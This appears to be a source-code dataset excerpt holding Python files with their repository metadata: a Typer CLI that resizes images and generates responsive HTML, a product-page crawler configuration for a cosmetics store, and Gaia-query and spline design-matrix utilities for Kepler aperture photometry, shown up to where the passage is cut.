            .joinpath("fixtures")
            .joinpath("xfer-original.jpg")
        ),
        help="Image file location",
    ),
    widths: str = typer.Option("600,1000,1400", help="Widths of new images, in pixels"),
    html: bool = typer.Option(True, help="Generate HTML <img> tag"),
    classes: str = typer.Option(
        None, help='Classnames to add to the <img> tag (e.g. class="img-fluid")'
    ),
    img_sizes: str = typer.Option(
        "100vw", help='Sizes for the <img> tag (e.g. sizes="100vw")'
    ),
    lazy: bool = typer.Option(False, help='Adds loading="lazy" to <img> tag for SEO'),
    alt: str = typer.Option(
        "", help='Adds alt="" to the <img> tag (e.g. alt="Funny image")'
    ),
    dir: str = typer.Option(
        None, help='Images directory to prepend to the src (e.g. src="dir/images")'
    ),
    fmt: str = typer.Option(
        "webp", help='Image type to save as ("jpg" and "webp" supported)'
    ),
    qual: int = typer.Option(100, help="Compression to apply (i.e. 0=max, 100=min)"),
    lower: bool = typer.Option(True, help="Converts filename to lowercase"),
    dashes: bool = typer.Option(True, help="Converts underscores to dashes for SEO"),
    flask: bool = typer.Option(
        False, help="Uses Python Flask's 'url_for('static', ...)'"
    ),
) -> None:
    """Resize one image

    Resizes the given image to each requested width and, optionally,
    prints a responsive HTML <img> snippet referencing the new files.
    """
    # Echo the effective configuration so the user can audit the run.
    typer.secho(f"Image: {image}", fg=typer.colors.GREEN)
    typer.echo(f"Widths needed: {widths}")
    typer.echo(f"HTML wanted: {html}")
    typer.echo(f"Classes wanted: {classes}")
    typer.echo(f"Image sizes wanted: {img_sizes}")
    typer.echo(f"Lazy loading wanted: {lazy}")
    typer.echo(f"Alt text wanted: {alt}")
    typer.echo(f"Directory to append: {dir}")
    typer.echo(f"Image format wanted: {fmt}")
    typer.echo(f"Quality/compression wanted: {qual}")
    typer.echo(f"Lowercase filename wanted: {lower}")
    typer.echo(f"Dashes wanted: {dashes}")
    typer.echo(f"Flask url_for() wanted: {flask}")
    # Parse the comma-separated width list into integers.
    widths_split = widths.split(",")
    widths_list = [int(width) for width in widths_split]
    file = Path(image)
    # Write one resized copy of the source image per requested width.
    filenames = resize_image(
        file=file,
        widths=widths_list,
        fmt=fmt,
        qual=qual,
        lower=lower,
        dashes=dashes,
    )
    typer.echo(f"filenames: {filenames}")
    if html:
        # Emit the responsive <img srcset=...> snippet for the new files.
        make_html(
            orig_img_file=file,
            filenames=filenames,
            classes=classes,
            img_sizes=img_sizes,
            lazy=lazy,
            alt=alt,
            dir=dir,
            flask=flask,
        )
| 29.754386 | 88 | 0.600825 | import logging
from pathlib import Path
from typing import Optional
import typer
from . import __app_name__, __version__
from .utils import make_html, resize_image
app = typer.Typer()
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
def _version_callback(value: bool) -> None:
    """Print the application name/version and exit when --version is set."""
    if not value:
        return
    typer.echo(f"{__app_name__} v{__version__}")
    raise typer.Exit()
@app.callback()
def main(
    version: Optional[bool] = typer.Option(
        None,
        "--version",
        "-v",
        help="Show the application's version and exit.",
        callback=_version_callback,
        is_eager=True,
    )
) -> bool:
    """Root callback: wires up the eager ``--version`` / ``-v`` option."""
    # The eager callback already exited when --version was given; just
    # report whether the flag was set.
    return bool(version)
@app.command()
def image(
image: str = typer.Argument(
str(
Path(__file__)
.parent.parent.joinpath("tests")
.joinpath("fixtures")
.joinpath("xfer-original.jpg")
),
help="Image file location",
),
widths: str = typer.Option("600,1000,1400", help="Widths of new images, in pixels"),
html: bool = typer.Option(True, help="Generate HTML <img> tag"),
classes: str = typer.Option(
None, help='Classnames to add to the <img> tag (e.g. class="img-fluid")'
),
img_sizes: str = typer.Option(
"100vw", help='Sizes for the <img> tag (e.g. sizes="100vw")'
),
lazy: bool = typer.Option(False, help='Adds loading="lazy" to <img> tag for SEO'),
alt: str = typer.Option(
"", help='Adds alt="" to the <img> tag (e.g. alt="Funny image")'
),
dir: str = typer.Option(
None, help='Images directory to prepend to the src (e.g. src="dir/images")'
),
fmt: str = typer.Option(
"webp", help='Image type to save as ("jpg" and "webp" supported)'
),
qual: int = typer.Option(100, help="Compression to apply (i.e. 0=max, 100=min)"),
lower: bool = typer.Option(True, help="Converts filename to lowercase"),
dashes: bool = typer.Option(True, help="Converts underscores to dashes for SEO"),
flask: bool = typer.Option(
False, help="Uses Python Flask's 'url_for('static', ...)'"
),
) -> None:
"""Resize one image"""
typer.secho(f"Image: {image}", fg=typer.colors.GREEN)
typer.echo(f"Widths needed: {widths}")
typer.echo(f"HTML wanted: {html}")
typer.echo(f"Classes wanted: {classes}")
typer.echo(f"Image sizes wanted: {img_sizes}")
typer.echo(f"Lazy loading wanted: {lazy}")
typer.echo(f"Alt text wanted: {alt}")
typer.echo(f"Directory to append: {dir}")
typer.echo(f"Image format wanted: {fmt}")
typer.echo(f"Quality/compression wanted: {qual}")
typer.echo(f"Lowercase filename wanted: {lower}")
typer.echo(f"Dashes wanted: {dashes}")
typer.echo(f"Flask url_for() wanted: {flask}")
widths_split = widths.split(",")
widths_list = [int(width) for width in widths_split]
file = Path(image)
filenames = resize_image(
file=file,
widths=widths_list,
fmt=fmt,
qual=qual,
lower=lower,
dashes=dashes,
)
typer.echo(f"filenames: {filenames}")
if html:
make_html(
orig_img_file=file,
filenames=filenames,
classes=classes,
img_sizes=img_sizes,
lazy=lazy,
alt=alt,
dir=dir,
flask=flask,
)
| 383 | 0 | 45 |
d39c831d0e173af80cda2346e3fcde70b0552897 | 489 | py | Python | service/impl/epoca_cosmeticos.py | ralphavalon/avaloncrawler | 1da60d3f463f1ce8e4422604bc59a86b72e60586 | [
"MIT"
] | null | null | null | service/impl/epoca_cosmeticos.py | ralphavalon/avaloncrawler | 1da60d3f463f1ce8e4422604bc59a86b72e60586 | [
"MIT"
] | null | null | null | service/impl/epoca_cosmeticos.py | ralphavalon/avaloncrawler | 1da60d3f463f1ce8e4422604bc59a86b72e60586 | [
"MIT"
] | null | null | null | # coding: utf-8
import os
from ..crawlable import Crawlable | 23.285714 | 62 | 0.640082 | # coding: utf-8
import os
from ..crawlable import Crawlable
class EpocaCosmeticos(Crawlable):
    """Crawlable configuration for the Epoca Cosmeticos store.

    Each getter returns a constant used by the crawler: the home-page
    URL, XPath selectors for category links and product names, and a
    regex recognizing product-page URLs.
    """
    def get_crawlable_name(self):
        # Identifier used to label this crawler.
        return 'EpocaCosmeticos'
    def get_category_pages(self):
        # XPath selecting every category link inside the top menu.
        return '//div[@class="menu"]//a/@href'
    def get_product_pages(self):
        # Regex: product-page URLs end with "/p".
        return '.*/p$'
    def get_home_page(self):
        return 'http://www.epocacosmeticos.com.br/'
    def get_product_name(self):
        # XPath extracting the product name text from a product page.
        return '//div[contains(@class, "productName")]/text()'
3c6cfb957e3b92b337bc0d431ffb2ddfe0667ac7 | 12,108 | py | Python | src/kepler_apertures/utils.py | jorgemarpa/kepler-apertures | a9a3842016a05a57e79fd47338bef0aa354bb148 | [
"MIT"
] | null | null | null | src/kepler_apertures/utils.py | jorgemarpa/kepler-apertures | a9a3842016a05a57e79fd47338bef0aa354bb148 | [
"MIT"
] | null | null | null | src/kepler_apertures/utils.py | jorgemarpa/kepler-apertures | a9a3842016a05a57e79fd47338bef0aa354bb148 | [
"MIT"
] | null | null | null | """
Collection of utility functions
"""
import numpy as np
import functools
from scipy import sparse
from patsy import dmatrix
from tqdm import tqdm
import pyia
import matplotlib.pyplot as plt
from astropy import units
from astropy.time import Time
from astropy.timeseries import BoxLeastSquares
@functools.lru_cache()
def get_gaia_sources(ras, decs, rads, magnitude_limit=18, epoch=2020, dr=2):
    """
    Will find gaia sources using a TAP query, accounting for proper motions.

    Inputs have to be hashable (e.g. tuples) because results are memoized
    with ``functools.lru_cache``.

    Parameters
    ----------
    ras : tuple
        Tuple with right ascension coordinates to be queried
        shape nsources
    decs : tuple
        Tuple with declination coordinates to be queried
        shape nsources
    rads : tuple
        Tuple with radius query
        shape nsources
    magnitude_limit : int
        Limiting magnitued for query
    epoch : float
        Year of the observation (Julian year) used for proper motion correction.
    dr : int
        Gaia Data Release to be used, DR2 or EDR3.

    Returns
    -------
    Pandas DatFrame with number of result sources (rows) and Gaia columns

    Raises
    ------
    ValueError
        If ``dr`` is neither 2 nor 3.
    """
    # Allow scalar inputs by wrapping them into single-element lists.
    if not hasattr(ras, "__iter__"):
        ras = [ras]
    if not hasattr(decs, "__iter__"):
        decs = [decs]
    if not hasattr(rads, "__iter__"):
        rads = [rads]
    # One ADQL cone-search clause per target; OR-joined below into a
    # single WHERE condition so all targets go out in one TAP query.
    wheres = [
        f"""1=CONTAINS(
                       POINT('ICRS',ra,dec),
                       CIRCLE('ICRS',{ra},{dec},{rad}))"""
        for ra, dec, rad in zip(ras, decs, rads)
    ]
    where = """\n\tOR """.join(wheres)
    if dr == 2:
        # CH: We don't need a lot of these columns we could greatly reduce it
        gd = pyia.GaiaData.from_query(
            f"""SELECT solution_id, designation, source_id, random_index, ref_epoch,
        coord1(prop) AS ra, ra_error, coord2(prop) AS dec, dec_error, parallax,
        parallax_error, parallax_over_error, pmra, pmra_error, pmdec, pmdec_error,
        ra_dec_corr, ra_parallax_corr, ra_pmra_corr, ra_pmdec_corr, dec_parallax_corr,
        dec_pmra_corr, dec_pmdec_corr, parallax_pmra_corr, parallax_pmdec_corr,
        pmra_pmdec_corr, astrometric_n_obs_al, astrometric_n_obs_ac,
        astrometric_n_good_obs_al, astrometric_n_bad_obs_al, astrometric_gof_al,
        astrometric_chi2_al, astrometric_excess_noise, astrometric_excess_noise_sig,
        astrometric_params_solved, astrometric_primary_flag, astrometric_weight_al,
        astrometric_pseudo_colour, astrometric_pseudo_colour_error,
        mean_varpi_factor_al, astrometric_matched_observations,
        visibility_periods_used, astrometric_sigma5d_max, frame_rotator_object_type,
        matched_observations, duplicated_source, phot_g_n_obs, phot_g_mean_flux,
        phot_g_mean_flux_error, phot_g_mean_flux_over_error, phot_g_mean_mag,
        phot_bp_n_obs, phot_bp_mean_flux, phot_bp_mean_flux_error,
        phot_bp_mean_flux_over_error, phot_bp_mean_mag, phot_rp_n_obs,
        phot_rp_mean_flux, phot_rp_mean_flux_error, phot_rp_mean_flux_over_error,
        phot_rp_mean_mag, phot_bp_rp_excess_factor, phot_proc_mode, bp_rp, bp_g, g_rp,
        radial_velocity, radial_velocity_error, rv_nb_transits, rv_template_teff,
        rv_template_logg, rv_template_fe_h, phot_variable_flag, l, b, ecl_lon, ecl_lat,
        priam_flags, teff_val, teff_percentile_lower, teff_percentile_upper, a_g_val,
        a_g_percentile_lower, a_g_percentile_upper, e_bp_min_rp_val,
        e_bp_min_rp_percentile_lower, e_bp_min_rp_percentile_upper, flame_flags,
        radius_val, radius_percentile_lower, radius_percentile_upper, lum_val,
        lum_percentile_lower, lum_percentile_upper, datalink_url, epoch_photometry_url,
        ra as ra_gaia, dec as dec_gaia FROM (
            SELECT *,
            EPOCH_PROP_POS(ra, dec, parallax, pmra, pmdec, 0, ref_epoch, {epoch}) AS prop
            FROM gaiadr2.gaia_source
            WHERE {where}
        ) AS subquery
        WHERE phot_g_mean_mag<={magnitude_limit}
        """
        )
    elif dr == 3:
        # EDR3 query: a much smaller column selection than the DR2 branch.
        gd = pyia.GaiaData.from_query(
            f"""SELECT designation,
            coord1(prop) AS ra, ra_error, coord2(prop) AS dec, dec_error,
            parallax, parallax_error, pmra, pmra_error, pmdec, pmdec_error,
            dr2_radial_velocity, dr2_radial_velocity_error,
            ruwe, phot_g_n_obs, phot_g_mean_flux,
            phot_g_mean_flux_error, phot_g_mean_mag,
            phot_bp_n_obs, phot_bp_mean_flux, phot_bp_mean_flux_error,
            phot_bp_mean_mag, phot_rp_n_obs,
            phot_rp_mean_flux, phot_rp_mean_flux_error,
            phot_rp_mean_mag FROM (
                SELECT *,
                EPOCH_PROP_POS(ra, dec, parallax, pmra, pmdec, 0, ref_epoch, {epoch}) AS prop
                FROM gaiaedr3.gaia_source
                WHERE {where}
            ) AS subquery
        WHERE phot_g_mean_mag<={magnitude_limit}
        """
        )
    else:
        raise ValueError("Please pass a valid data release")
    return gd.data.to_pandas()
def make_A_edges(r, f, type="quadratic"):
    """
    Creates a design matrix to estimate the PSF edge (in pixels) as a
    function of the flux.

    Parameters
    ----------
    r : numpy ndarray
        Array with radii values
    f : numpy ndarray
        Array with flux values
    type : string
        Type of basis for the design matrix; one of "linear",
        "r-quadratic", "cubic", "exp", "inverse" or "rf-quadratic".
        NOTE(review): the default "quadratic" is not a recognized basis
        and raises ValueError — confirm the intended default.

    Returns
    -------
    A : numpy ndarray
        A design matrix of shape (len(r), n_basis)

    Raises
    ------
    ValueError
        If ``type`` is not one of the recognized basis names.
    """
    ones = r ** 0
    # Lazily-built column stacks keyed by basis name; each entry lists the
    # basis columns in the same order as the original implementation.
    builders = {
        "linear": lambda: [ones, r, f],
        "r-quadratic": lambda: [ones, r, r ** 2, f],
        "cubic": lambda: [ones, r, r ** 2, r ** 3, f],
        "exp": lambda: [ones, np.exp(-r), f],
        "inverse": lambda: [ones, 1 / r, f],
        "rf-quadratic": lambda: [
            ones, r, r ** 2,
            ones * f, r * f, r ** 2 * f,
            ones * f ** 2, r * f ** 2, r ** 2 * f ** 2,
        ],
    }
    if type not in builders:
        raise ValueError("Wrong desing matrix basis type")
    return np.vstack(builders[type]()).T
def solve_linear_model(
    A, y, y_err=None, prior_mu=None, prior_sigma=None, k=None, errors=False
):
    """
    Solves a linear model with design matrix A and observations y:
        Aw = y
    return the solutions w for the system assuming Gaussian priors.
    Alternatively the observation errors, priors, and a boolean mask for the
    observations (row axis) can be provided.

    Adapted from Luger, Foreman-Mackey & Hogg, 2017
    (https://ui.adsabs.harvard.edu/abs/2017RNAAS...1....7L/abstract)

    Parameters
    ----------
    A : numpy ndarray or scipy sparse matrix
        Design matrix with solution basis
        shape n_observations x n_basis
    y : numpy ndarray
        Observations
        shape n_observations
    y_err : numpy ndarray, optional
        Observation errors
        shape n_observations
    prior_mu : float, optional
        Mean of Gaussian prior values for the weights (w)
    prior_sigma : float, optional
        Standard deviation of Gaussian prior values for the weights (w)
    k : boolean, numpy ndarray, optional
        Mask that sets the observations to be used to solve the system
        shape n_observations
    errors : boolean
        Whether to also return the 1-sigma uncertainties of the weights.

    Returns
    -------
    w : numpy ndarray
        Array with the estimations for the weights
        shape n_basis
    werrs : numpy ndarray
        Array with the error estimations for the weights; returned only
        when ``errors`` is True
        shape n_basis
    """
    if k is None:
        k = np.ones(len(y), dtype=bool)

    if y_err is not None:
        # Inverse-variance weighting of each observation (row).
        weights = 1 / y_err[k, None] ** 2
        if sparse.issparse(A):
            sigma_w_inv = A[k].T.dot(A[k].multiply(weights))
        else:
            # Dense path: elementwise row scaling replaces sparse .multiply
            # (the previous implementation crashed here for dense A).
            sigma_w_inv = A[k].T.dot(A[k] * weights)
        B = A[k].T.dot((y[k] / y_err[k] ** 2))
    else:
        sigma_w_inv = A[k].T.dot(A[k])
        B = A[k].T.dot(y[k])

    if prior_mu is not None and prior_sigma is not None:
        # Gaussian priors act as an L2 (ridge) regularization term.
        sigma_w_inv += np.diag(1 / prior_sigma ** 2)
        B += prior_mu / prior_sigma ** 2

    # np.linalg.solve needs a dense ndarray: densify any sparse result and
    # demote np.matrix to a plain array.
    if sparse.issparse(sigma_w_inv):
        sigma_w_inv = sigma_w_inv.toarray()
    if isinstance(sigma_w_inv, np.matrix):
        sigma_w_inv = np.asarray(sigma_w_inv)

    w = np.linalg.solve(sigma_w_inv, B)
    if errors is True:
        w_err = np.linalg.inv(sigma_w_inv).diagonal() ** 0.5
        return w, w_err
    return w
def _make_A_polar(phi, r, cut_r=1.5, rmin=1, rmax=5, n_r_knots=12, n_phi_knots=15):
    """
    Makes a spline design matrix in polar coordinates

    Parameters
    ----------
    phi : numpy ndarray
        Angle values in radians (fed to the wrapped/periodic spline basis)
    r : numpy ndarray
        Radius values
    cut_r : float
        Radius below which the angle dependency is removed from the basis
    rmin : float
        Minimum radius value for the array of knots
    rmax : float
        Maximum radius value for the array of knots
    n_r_knots : int
        Number of knots to used for the radius axis
    n_phi_knots : int
        Number of knots to used for the angle axis

    Returns
    -------
    X1 : sparse matrix
        Design matrix in polar coordinates using spline as base functions
    """
    # create the spline bases for radius and angle
    phi_spline = sparse.csr_matrix(wrapped_spline(phi, order=3, nknots=n_phi_knots).T)
    # Knots spaced uniformly in sqrt(r) then squared: denser near rmin.
    r_knots = np.linspace(rmin ** 0.5, rmax ** 0.5, n_r_knots) ** 2
    cut_r_int = np.where(r_knots <= cut_r)[0].max()
    r_spline = sparse.csr_matrix(
        np.asarray(
            dmatrix(
                "bs(x, knots=knots, degree=3, include_intercept=True)",
                {"x": list(r), "knots": r_knots},
            )
        )
    )
    # build full desing matrix
    X = sparse.hstack(
        [phi_spline.multiply(r_spline[:, idx]) for idx in range(r_spline.shape[1])],
        format="csr",
    )
    # find and remove the angle dependency for all basis for radius < 6
    cut = np.arange(0, phi_spline.shape[1] * cut_r_int)
    a = list(set(np.arange(X.shape[1])) - set(cut))
    # Replace the cut angle-dependent columns with radius-only columns plus
    # a constant (intercept) column.
    X1 = sparse.hstack(
        [X[:, a], r_spline[:, 1:cut_r_int], sparse.csr_matrix(np.ones(X.shape[0])).T],
        format="csr",
    )
    return X1
def wrapped_spline(input_vector, order=2, nknots=10):
    """
    Creates a vector of folded-spline basis according to the input data. This is meant
    to be used to build the basis vectors for periodic data, like the angle in polar
    coordinates.

    Parameters
    ----------
    input_vector : numpy.ndarray
        Input data to create basis, angle values MUST BE BETWEEN -PI and PI.
    order : int
        Order of the spline basis.
        NOTE(review): the ``for order in np.arange(1, 4)`` loop below shadows
        this parameter, so the passed value is ignored and the basis is always
        raised to order 3 — confirm whether that is intended.
    nknots : int
        Number of knots for the splines

    Returns
    -------
    folded_basis : numpy.ndarray
        Array of folded-spline basis

    Raises
    ------
    ValueError
        If any input value lies outside the open interval (-pi, pi).
    """
    if not ((input_vector > -np.pi) & (input_vector < np.pi)).all():
        raise ValueError("Must be between -pi and pi")
    x = np.copy(input_vector)
    # Duplicate the data shifted by 2*pi so the basis can wrap around.
    x1 = np.hstack([x, x + np.pi * 2])
    nt = (nknots * 2) + 1
    t = np.linspace(-np.pi, 3 * np.pi, nt)
    dt = np.median(np.diff(t))
    # Zeroth order basis
    basis = np.asarray(
        [
            ((x1 >= t[idx]) & (x1 < t[idx + 1])).astype(float)
            for idx in range(len(t) - 1)
        ]
    )
    # Higher order basis (Cox-de Boor-style recursion up to order 3)
    for order in np.arange(1, 4):
        basis_1 = []
        for idx in range(len(t) - 1):
            a = ((x1 - t[idx]) / (dt * order)) * basis[idx]
            if ((idx + order + 1)) < (nt - 1):
                b = (-(x1 - t[(idx + order + 1)]) / (dt * order)) * basis[
                    (idx + 1) % (nt - 1)
                ]
            else:
                b = np.zeros(len(x1))
            basis_1.append(a + b)
        basis = np.vstack(basis_1)
    # Fold the second (shifted) half of the basis back onto the first half
    # so the spline is periodic over [-pi, pi).
    folded_basis = np.copy(basis)[: nt // 2, : len(x)]
    for idx in np.arange(-order, 0):
        folded_basis[idx, :] += np.copy(basis)[nt // 2 + idx, len(x) :]
    return folded_basis
| 34.594286 | 91 | 0.604972 | """
Collection of utility functions
"""
import numpy as np
import functools
from scipy import sparse
from patsy import dmatrix
from tqdm import tqdm
import pyia
import matplotlib.pyplot as plt
from astropy import units
from astropy.time import Time
from astropy.timeseries import BoxLeastSquares
@functools.lru_cache()
def get_gaia_sources(ras, decs, rads, magnitude_limit=18, epoch=2020, dr=2):
"""
Will find gaia sources using a TAP query, accounting for proper motions.
Inputs have be hashable, e.g. tuples
Parameters
----------
ras : tuple
Tuple with right ascension coordinates to be queried
shape nsources
decs : tuple
Tuple with declination coordinates to be queried
shape nsources
rads : tuple
Tuple with radius query
shape nsources
magnitude_limit : int
Limiting magnitued for query
epoch : float
Year of the observation (Julian year) used for proper motion correction.
dr : int
Gaia Data Release to be used, DR2 or EDR3.
Returns
-------
Pandas DatFrame with number of result sources (rows) and Gaia columns
"""
if not hasattr(ras, "__iter__"):
ras = [ras]
if not hasattr(decs, "__iter__"):
decs = [decs]
if not hasattr(rads, "__iter__"):
rads = [rads]
wheres = [
f"""1=CONTAINS(
POINT('ICRS',ra,dec),
CIRCLE('ICRS',{ra},{dec},{rad}))"""
for ra, dec, rad in zip(ras, decs, rads)
]
where = """\n\tOR """.join(wheres)
if dr == 2:
# CH: We don't need a lot of these columns we could greatly reduce it
gd = pyia.GaiaData.from_query(
f"""SELECT solution_id, designation, source_id, random_index, ref_epoch,
coord1(prop) AS ra, ra_error, coord2(prop) AS dec, dec_error, parallax,
parallax_error, parallax_over_error, pmra, pmra_error, pmdec, pmdec_error,
ra_dec_corr, ra_parallax_corr, ra_pmra_corr, ra_pmdec_corr, dec_parallax_corr,
dec_pmra_corr, dec_pmdec_corr, parallax_pmra_corr, parallax_pmdec_corr,
pmra_pmdec_corr, astrometric_n_obs_al, astrometric_n_obs_ac,
astrometric_n_good_obs_al, astrometric_n_bad_obs_al, astrometric_gof_al,
astrometric_chi2_al, astrometric_excess_noise, astrometric_excess_noise_sig,
astrometric_params_solved, astrometric_primary_flag, astrometric_weight_al,
astrometric_pseudo_colour, astrometric_pseudo_colour_error,
mean_varpi_factor_al, astrometric_matched_observations,
visibility_periods_used, astrometric_sigma5d_max, frame_rotator_object_type,
matched_observations, duplicated_source, phot_g_n_obs, phot_g_mean_flux,
phot_g_mean_flux_error, phot_g_mean_flux_over_error, phot_g_mean_mag,
phot_bp_n_obs, phot_bp_mean_flux, phot_bp_mean_flux_error,
phot_bp_mean_flux_over_error, phot_bp_mean_mag, phot_rp_n_obs,
phot_rp_mean_flux, phot_rp_mean_flux_error, phot_rp_mean_flux_over_error,
phot_rp_mean_mag, phot_bp_rp_excess_factor, phot_proc_mode, bp_rp, bp_g, g_rp,
radial_velocity, radial_velocity_error, rv_nb_transits, rv_template_teff,
rv_template_logg, rv_template_fe_h, phot_variable_flag, l, b, ecl_lon, ecl_lat,
priam_flags, teff_val, teff_percentile_lower, teff_percentile_upper, a_g_val,
a_g_percentile_lower, a_g_percentile_upper, e_bp_min_rp_val,
e_bp_min_rp_percentile_lower, e_bp_min_rp_percentile_upper, flame_flags,
radius_val, radius_percentile_lower, radius_percentile_upper, lum_val,
lum_percentile_lower, lum_percentile_upper, datalink_url, epoch_photometry_url,
ra as ra_gaia, dec as dec_gaia FROM (
SELECT *,
EPOCH_PROP_POS(ra, dec, parallax, pmra, pmdec, 0, ref_epoch, {epoch}) AS prop
FROM gaiadr2.gaia_source
WHERE {where}
) AS subquery
WHERE phot_g_mean_mag<={magnitude_limit}
"""
)
elif dr == 3:
gd = pyia.GaiaData.from_query(
f"""SELECT designation,
coord1(prop) AS ra, ra_error, coord2(prop) AS dec, dec_error,
parallax, parallax_error, pmra, pmra_error, pmdec, pmdec_error,
dr2_radial_velocity, dr2_radial_velocity_error,
ruwe, phot_g_n_obs, phot_g_mean_flux,
phot_g_mean_flux_error, phot_g_mean_mag,
phot_bp_n_obs, phot_bp_mean_flux, phot_bp_mean_flux_error,
phot_bp_mean_mag, phot_rp_n_obs,
phot_rp_mean_flux, phot_rp_mean_flux_error,
phot_rp_mean_mag FROM (
SELECT *,
EPOCH_PROP_POS(ra, dec, parallax, pmra, pmdec, 0, ref_epoch, {epoch}) AS prop
FROM gaiaedr3.gaia_source
WHERE {where}
) AS subquery
WHERE phot_g_mean_mag<={magnitude_limit}
"""
)
else:
raise ValueError("Please pass a valid data release")
return gd.data.to_pandas()
def make_A_edges(r, f, type="quadratic"):
    """
    Creates a design matrix to estimate the PSF edge (in pixels) as a function
    of the flux.

    Parameters
    ----------
    r : numpy ndarray
        Array with radii values
    f : numpy ndarray
        Array with flux values
    type : string
        Type of basis for the design matrix. One of "linear", "r-quadratic",
        "cubic", "exp", "inverse", or "quadratic"/"rf-quadratic" (the default),
        which is quadratic in both radius and flux.

    Returns
    -------
    A : numpy ndarray
        A design matrix

    Raises
    ------
    ValueError
        If ``type`` is not one of the supported basis names.
    """
    # NOTE: the parameter is named `type` (shadowing the builtin) to keep the
    # public interface unchanged for existing callers.
    if type == "linear":
        A = np.vstack([r ** 0, r, f]).T
    elif type == "r-quadratic":
        A = np.vstack([r ** 0, r, r ** 2, f]).T
    elif type == "cubic":
        A = np.vstack([r ** 0, r, r ** 2, r ** 3, f]).T
    elif type == "exp":
        A = np.vstack([r ** 0, np.exp(-r), f]).T
    elif type == "inverse":
        A = np.vstack([r ** 0, 1 / r, f]).T
    elif type in ("quadratic", "rf-quadratic"):
        # Bug fix: the documented default "quadratic" previously fell through
        # to the error branch; it is now an alias for "rf-quadratic".
        A = np.vstack(
            [
                r ** 0,
                r,
                r ** 2,
                r ** 0 * f,
                r * f,
                r ** 2 * f,
                r ** 0 * f ** 2,
                r * f ** 2,
                r ** 2 * f ** 2,
            ]
        ).T
    else:
        raise ValueError("Wrong design matrix basis type")
    return A
def solve_linear_model(
    A, y, y_err=None, prior_mu=None, prior_sigma=None, k=None, errors=False
):
    """
    Solves a linear model with design matrix A and observations y:
        Aw = y
    returning the weights w, assuming Gaussian priors.
    Optionally the observation errors, priors, and a boolean mask for the
    observations (row axis) can be provided.
    Adapted from Luger, Foreman-Mackey & Hogg, 2017
    (https://ui.adsabs.harvard.edu/abs/2017RNAAS...1....7L/abstract)

    Parameters
    ----------
    A : numpy ndarray or scipy sparse matrix
        Design matrix with solution basis,
        shape n_observations x n_basis
    y : numpy ndarray
        Observations,
        shape n_observations
    y_err : numpy ndarray, optional
        Observation errors,
        shape n_observations
    prior_mu : float, optional
        Mean of Gaussian prior values for the weights (w)
    prior_sigma : float, optional
        Standard deviation of Gaussian prior values for the weights (w)
    k : boolean numpy ndarray, optional
        Mask that sets the observations to be used to solve the system,
        shape n_observations
    errors : bool, optional
        If True, also return the 1-sigma uncertainties of the weights.

    Returns
    -------
    w : numpy ndarray
        Array with the estimations for the weights,
        shape n_basis
    werrs : numpy ndarray
        Array with the error estimations for the weights, returned only when
        ``errors`` is True,
        shape n_basis
    """
    if k is None:
        # Use every observation by default.
        k = np.ones(len(y), dtype=bool)
    A_k = A[k]
    if y_err is not None:
        # Inverse-variance weights for the masked observations.
        inv_var = 1 / y_err[k] ** 2
        if sparse.issparse(A_k):
            sigma_w_inv = A_k.T.dot(A_k.multiply(inv_var[:, None]))
        else:
            # Bug fix: dense ndarrays have no .multiply(); use an elementwise
            # product so the documented ndarray input actually works.
            sigma_w_inv = A_k.T.dot(A_k * inv_var[:, None])
        B = A_k.T.dot(y[k] * inv_var)
    else:
        sigma_w_inv = A_k.T.dot(A_k)
        B = A_k.T.dot(y[k])
    if prior_mu is not None and prior_sigma is not None:
        sigma_w_inv += np.diag(1 / prior_sigma ** 2)
        B += prior_mu / prior_sigma ** 2
    # np.linalg.solve needs a plain 2-D ndarray; sparse products (and the
    # np.matrix that can result from adding np.diag to one) must be converted.
    if sparse.issparse(sigma_w_inv):
        sigma_w_inv = sigma_w_inv.toarray()
    if isinstance(sigma_w_inv, np.matrix):
        sigma_w_inv = np.asarray(sigma_w_inv)
    w = np.linalg.solve(sigma_w_inv, B)
    if errors:
        w_err = np.linalg.inv(sigma_w_inv).diagonal() ** 0.5
        return w, w_err
    return w
def _make_A_polar(phi, r, cut_r=1.5, rmin=1, rmax=5, n_r_knots=12, n_phi_knots=15):
    """
    Build a spline design matrix in polar coordinates.

    Parameters
    ----------
    phi : numpy ndarray
        Angle values.
    r : numpy ndarray
        Radius values.
    cut_r : float
        Radius below which the angle dependency of the basis is removed.
    rmin : float
        Minimum radius value for the array of knots.
    rmax : float
        Maximum radius value for the array of knots.
    n_r_knots : int
        Number of knots used for the radius axis.
    n_phi_knots : int
        Number of knots used for the angle axis.

    Returns
    -------
    X1 : sparse matrix
        Design matrix in polar coordinates using splines as base functions.
    """
    # Periodic (folded) spline basis for the angle.
    phi_basis = sparse.csr_matrix(wrapped_spline(phi, order=3, nknots=n_phi_knots).T)
    # Radius knots spaced uniformly in sqrt(r) to concentrate them near rmin.
    r_knots = np.linspace(rmin ** 0.5, rmax ** 0.5, n_r_knots) ** 2
    # Index of the last knot at or below cut_r.
    n_inner = np.where(r_knots <= cut_r)[0].max()
    r_basis = sparse.csr_matrix(
        np.asarray(
            dmatrix(
                "bs(x, knots=knots, degree=3, include_intercept=True)",
                {"x": list(r), "knots": r_knots},
            )
        )
    )
    # Tensor product of the angle and radius bases.
    X = sparse.hstack(
        [phi_basis.multiply(r_basis[:, col]) for col in range(r_basis.shape[1])],
        format="csr",
    )
    # Remove the angle-dependent columns for radii below cut_r.
    n_drop = phi_basis.shape[1] * n_inner
    keep = list(set(range(X.shape[1])) - set(range(n_drop)))
    # Re-assemble: angle-free inner-radius columns plus a constant column.
    return sparse.hstack(
        [X[:, keep], r_basis[:, 1:n_inner], sparse.csr_matrix(np.ones(X.shape[0])).T],
        format="csr",
    )
def wrapped_spline(input_vector, order=2, nknots=10):
    """
    Creates a vector of folded-spline basis according to the input data. This
    is meant to be used to build the basis vectors for periodic data, like the
    angle in polar coordinates.

    Parameters
    ----------
    input_vector : numpy.ndarray
        Input data to create basis, angle values MUST BE BETWEEN -PI and PI.
    order : int
        Order of the spline basis
    nknots : int
        Number of knots for the splines

    Returns
    -------
    folded_basis : numpy.ndarray
        Array of folded-spline basis
    """
    if not ((input_vector > -np.pi) & (input_vector < np.pi)).all():
        raise ValueError("Must be between -pi and pi")
    x = np.copy(input_vector)
    # Duplicate the data shifted by 2*pi so the basis can wrap around.
    x1 = np.hstack([x, x + np.pi * 2])
    nt = (nknots * 2) + 1
    t = np.linspace(-np.pi, 3 * np.pi, nt)
    dt = np.median(np.diff(t))
    # Zeroth order basis: indicator functions on the knot intervals.
    basis = np.asarray(
        [
